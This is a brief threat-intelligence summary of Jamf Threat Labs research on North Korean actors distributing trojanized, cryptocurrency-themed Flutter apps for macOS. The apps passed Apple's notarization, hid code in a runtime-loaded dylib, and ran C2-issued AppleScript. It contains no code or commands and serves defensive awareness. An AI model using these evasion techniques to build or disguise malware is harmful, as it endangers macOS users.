November 12, 2024 at 10:46AM
North Korean threat actors are targeting macOS systems with trojanized cryptocurrency-themed apps built using Flutter, which bypassed Appleās security checks. Discovered by Jamf Threat Labs, these signed and notarized apps connected to DPRK servers and executed scripts. Apple revoked their signatures, but the full extent of the operation is unclear.
### Meeting Takeaways:
1. **Targeting macOS:** North Korean threat actors have developed trojanized Notepad apps and Minesweeper games targeting macOS users, utilizing the Flutter framework.
2. **Legitimate Signing:** These malicious applications are signed and notarized with a legitimate Apple developer ID, allowing them to pass Apple’s security checks and execute on macOS systems without restrictions.
3. **Focus on Cryptocurrency:** The application themes revolve around cryptocurrency, reflecting North Korea’s interest in financial theft.
4. **Research Insights:** Jamf Threat Labs identified this activity as more of an experimental approach to bypass macOS security rather than a highly targeted campaign.
5. **Connection to DPRK Servers:** Starting in November 2024, various apps appeared on VirusTotal that, while appearing innocent, connected to servers linked to North Korean actors and showcased “stage one” functionality.
6. **Detection Challenges:** The use of the Flutter framework allows for embedding malicious code within a dynamic library (dylib), making detection more challenging by loading the code at runtime.
7. **Malware Capabilities:** Analysis of specific applications revealed obfuscated code enabling AppleScript execution, allowing commands to be sent from a command and control (C2) server.
8. **Revocation of Signatures:** Apple has revoked the signatures of the identified malicious apps, preventing them from bypassing Gatekeeper defenses on updated macOS systems.
9. **Operational Uncertainty:** It remains unclear whether these apps were used in actual cyber operations or were only experiments to test bypass techniques, as multiple variants of the applications were discovered.
10. **Further Investigation Required:** The specifics of this operation are not fully understood, indicating a need for ongoing monitoring and research into these types of threats.